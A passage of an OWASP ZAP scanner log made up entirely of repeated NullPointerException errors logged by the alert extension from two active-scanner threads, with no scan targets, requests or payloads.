java.lang.NullPointerException 13420579 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13420583 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13420781 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13420782 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13420983 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13420983 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13421185 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13421185 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13421830 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13421830 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13422032 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13422034 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13422235 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13422235 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13422436 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13422437 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13422661 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13422661 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13422836 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423039 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423039 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423237 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423241 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423439 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423440 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423641 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423643 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423839 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13423844 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13424040 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13424242 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13424243 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13424444 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13424447 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13424644 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13424645 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13424846 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13424846 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13425047 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13425047 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13425248 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13425450 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13425450 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13425655 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13425655 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13425849 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13425851 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13426055 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13426055 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13426251 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13426454 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13426454 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13426652 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13426653 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13426852 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13426854 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13427055 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13427055 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13427259 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13427260 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13427475 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13427660 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13427660 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13427860 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13427861 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13428060 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13428462 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13428462 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13428663 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13429621 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13429667 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13429668 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13429867 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13429868 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13430067 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13430067 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13430470 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13430669 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13430872 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13430872 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13431075 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13431279 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13431280 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13431478 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13431481 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13431680 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13432083 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13432083 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13432282 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13432484 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13432689 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13432689 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13432886 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13432886 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13433084 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13433087 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13433486 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13433686 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13433888 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13433888 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13434089 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13434292 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13434292 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13434490 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13434490 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13434689 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13434892 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13435292 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13435293 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13435494 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13435696 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13435696 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13436707 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13436707 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13436908 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13436913 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13437316 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13437516 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13437718 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13437718 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13437919 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13438121 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13438128 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13438321 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13438323 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13438525 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13438525 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13438721 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13438923 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13439128 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13439325 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13439325 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13439526 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13439526 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13439726 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13439727 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13439928 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13439928 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440128 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440130 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440331 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440331 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440531 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440531 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440732 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440732 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440932 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13440933 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441133 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441133 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441335 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441335 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441535 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441535 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441736 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441736 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441937 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13441937 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13442229 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13442229 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13442339 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13442339 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13443206 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13443209 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13443541 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13443541 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13443742 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13443742 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13443943 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13443943 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13444143 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13444144 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13444344 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13444544 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13444545 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13444746 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445149 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445149 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445350 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445350 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445550 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445550 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445751 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445751 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445953 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13445953 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446151 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446151 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446351 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446352 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446554 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446554 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446754 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446754 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446955 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13446956 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447156 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447156 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447357 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447357 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447557 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447557 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447758 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447758 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447959 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13447959 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13448160 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13448160 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13451574 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13451775 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13451775 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13451980 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13451980 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13452177 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13452177 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13452377 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13452378 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13452579 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13452579 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13452781 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13452782 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13453864 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13453864 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13453980 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13453980 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13454189 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13454190 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13454795 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13454994 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13454997 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13455199 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13455202 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13455397 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13455397 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13455603 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13455603 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456002 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456005 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456203 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456203 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456401 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456405 [ZAP-ActiveScanner-1] ERROR 